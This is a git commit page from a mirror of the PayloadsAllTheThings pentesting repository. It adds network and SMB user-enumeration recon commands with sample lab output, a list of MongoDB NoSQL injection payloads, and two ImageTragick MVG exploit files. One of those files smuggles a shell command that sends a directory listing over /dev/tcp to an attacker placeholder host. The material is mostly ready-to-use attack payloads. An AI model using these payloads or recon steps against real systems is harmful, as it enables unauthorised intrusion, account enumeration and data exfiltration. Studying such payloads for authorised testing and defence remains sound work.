admin/PayloadsAllTHINGS
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Methodology updated with RPCClient, User enumeration

Browse Source
This commit is contained in:
Swissky
2017-05-17 20:40:45 +02:00
parent 62f686dc1f
commit e89e4fd312
4 changed files with 148 additions and 38 deletions
Download Patch File Download Diff File Expand all files Collapse all files

153
Methodology_and_enumeration.md
View File

@@ -42,55 +42,120 @@ git clone https://github.com/ChrisTruncer/EyeWitness.git
``` ```
## Passive recon ## Passive recon
``` * Using Shodan (https://www.shodan.io/) to detect similar app
Using Shodan (https://www.shodan.io/) to detect similar app
Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints : * Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints,
- look for JS files, old links ```
look for JS files, old links
```
Using The Harvester (https://github.com/laramies/theHarvester) * Using The Harvester (https://github.com/laramies/theHarvester)
python theHarvester.py -b all -d domain.com ```
``` python theHarvester.py -b all -d domain.com
```
## Active recon ## Active recon
* Basic NMAP (if allowed ^^') * Basic NMAP
```bash ```bash
sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports • the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000) • the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
• 192.168.0.1 is the IP address to scan • 192.168.0.1 is the IP address to scan
• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE" • -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
• -iL INPUTFILE tells Nmap to use the provided file as inputs • -iL INPUTFILE tells Nmap to use the provided file as inputs
```
nmap -A -T4 scanme.nmap.org * Aggressive NMAP
• -A: Enable OS detection, version detection, script scanning, and traceroute ```bash
• -T4: Defines the timing for the task (options are 0-5 and higher is faster) nmap -A -T4 scanme.nmap.org
``` • -A: Enable OS detection, version detection, script scanning, and traceroute
• -T4: Defines the timing for the task (options are 0-5 and higher is faster)
```
* NMAP and add-ons
1. Using searchsploit to detect vulnerable services
```bash
nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml
```
2. Generating nice scan report
```bash
nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
```
*
```bash
nmap -p- -sV -oX a.xml host.domain.org
searchsploit --nmap a.xml
```
* NMAP Scripts * NMAP Scripts
```bash ```bash
nmap -sC : equivalent to --script=default nmap -sC : equivalent to --script=default
nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap
PORT STATE SERVICE PORT STATE SERVICE
80/tcp open http 80/tcp open http
| http-enum: | http-enum:
| /phpmyadmin/: phpMyAdmin | /phpmyadmin/: phpMyAdmin
| /.git/HEAD: Git folder | /.git/HEAD: Git folder
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' | /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_ /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' |_ /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
List Nmap scripts : ls /usr/share/nmap/scripts/ nmap --script smb-enum-users.nse -p 445 [target host]
``` Host script results:
| smb-enum-users:
| METASPLOITABLE\backup (RID: 1068)
| Full name: backup
| Flags: Account disabled, Normal user account
| METASPLOITABLE\bin (RID: 1004)
| Full name: bin
| Flags: Account disabled, Normal user account
| METASPLOITABLE\msfadmin (RID: 3000)
| Full name: msfadmin,,,
| Flags: Normal user account
List Nmap scripts : ls /usr/share/nmap/scripts/
```
* RPCClient
```bash
╰─$ rpcclient -U "" [target host]
rpcclient $> querydominfo
Domain: WORKGROUP
Server: METASPLOITABLE
Comment: metasploitable server (Samba 3.0.20-Debian)
Total Users: 35
rpcclient $> enumdomusers
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
```
* Enum4all
```
Usage: ./enum4linux.pl [options]ip
-U get userlist
-M get machine list*
-S get sharelist
-P get password policy information
-G get group and member list
-d be detailed, applies to -U and -S
-u user specify username to use (default “”)
-p pass specify password to use (default “”
-a Do all simple enumeration (-U -S -G -P -r -o -n -i).
-o Get OS information
-i Get printer information
==============================
| Users on XXX.XXX.XXX.XXX |
==============================
index: 0x1 Account: games Name: games Desc: (null)
index: 0x2 Account: nobody Name: nobody Desc: (null)
index: 0x3 Account: bind Name: (null) Desc: (null)
index: 0x4 Account: proxy Name: proxy Desc: (null)
index: 0x5 Account: syslog Name: (null) Desc: (null)
index: 0x6 Account: user Name: just a user,111,, Desc: (null)
index: 0x7 Account: www-data Name: www-data Desc: (null)
index: 0x8 Account: root Name: root Desc: (null)
```
## List all the subdirectories and files ## List all the subdirectories and files
@@ -118,6 +183,20 @@ More subdomain :
gobuster -w wordlist -u URL -r -e gobuster -w wordlist -u URL -r -e
``` ```
* Using Sublist3r
```bash
To enumerate subdomains of specific domain and show the results in realtime:
python sublist3r.py -v -d example.com
To enumerate subdomains and enable the bruteforce module:
python sublist3r.py -b -d example.com
To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines
python sublist3r.py -e google,yahoo,virustotal -d example.com
python sublist3r.py -b -d example.com
```
* Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois) * Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
```bash ```bash
#!/bin/bash #!/bin/bash

23
NoSQL injection/README.md
View File

@@ -24,6 +24,29 @@ username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.* username[$ne]=toto&password[$regex]=md.*
``` ```
## MongoDB Payloads
```
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
```
## Thanks to ## Thanks to
* https://www.dailysecurity.fr/nosql-injections-classique-blind/ * https://www.dailysecurity.fr/nosql-injections-classique-blind/
* https://www.owasp.org/index.php/Testing_for_NoSQL_injection * https://www.owasp.org/index.php/Testing_for_NoSQL_injection
* https://github.com/cr0hn/nosqlinjection_wordlists

4
Upload insecure files/Image Tragik/payload_remote_connection.mvg Normal file
View File

@@ -0,0 +1,4 @@
push graphic-context
viewbox 0 0 640 480
fill 'url(http://IP_ATTAQUANT/)'
pop graphic-context

4
Upload insecure files/Image Tragik/payload_remote_exec_command.mvg Normal file
View File

@@ -0,0 +1,4 @@
push graphic-context
viewbox 0 0 640 480
fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)'
pop graphic-context